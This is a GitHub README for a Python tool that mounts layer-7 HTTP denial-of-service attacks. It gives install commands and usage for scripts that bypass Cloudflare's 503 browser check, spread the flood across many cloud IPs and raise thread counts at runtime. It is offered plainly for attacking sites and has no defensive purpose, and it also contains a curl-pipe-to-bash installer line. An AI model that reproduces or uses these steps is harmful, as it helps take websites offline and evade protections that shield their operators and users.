Light Mode

Skip to content

Navigation Menu

Sign in
Appearance settings

Search code, repositories, users, issues, pull requests...

Provide feedback

We read every piece of feedback, and take your input very seriously.

Saved searches

Use saved searches to filter your results more quickly

Sign up
Appearance settings

Latest commit

History

History

Ddos-http-layer-7-using-python-master

README.md

Ddos-http-layer-7-using-python

Bypass 503 clodflare and launch attack from different elastic public ip's there is two method

before follow this instructions https://github.com/Anorov/cloudflare-scrape

AMI Linux user

sudo yum update
sudo yum install python
sudo easy_install pip
sudo pip install cfscrape
sudo pip install requests_toolbelt
curl -o- https://raw.githubusercontent.com/creationix/nvm/v0.32.0/install.sh | bash
. ~/.nvm/nvm.sh
nvm install 4.4.5
node -v
vi thread.txt (save as empty)

ubuntu user

sudo apt-get update
sudo apt-get install python
sudo apt-get install python-pip
pip install cfscrape
apt-get install nodejs
pip install requests_toolbelt
vi thread.txt (empty)

method 1

usage :
python tr503_alternative.py
example : python tr503_alternative.py 172.31.42.22 30 100

method 2

usage :
mkdir session

if the site is not under dos attack mode (503 checking your browser before accessing site)
python tr200.py "first-private-ip-of-n/w-interface" "how-much-ip"

After 503
python scraper503.py "first-private-ip-of-n/w-interface" "how-much-ip" "char"
python tr503.py "first-private-ip-of-n/w-interface" 'how-much-ip"

To increase thread level at Runtime
change the values in thread.txt to increase threads